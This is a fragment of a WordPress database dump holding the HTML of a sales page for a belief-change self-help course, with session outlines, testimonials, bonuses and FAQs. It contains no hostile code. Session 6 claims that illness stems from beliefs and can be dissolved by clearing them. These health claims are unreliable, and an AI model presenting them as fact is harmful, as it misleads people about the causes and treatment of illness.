get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:02:53', '2014-06-19 06:02:53', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
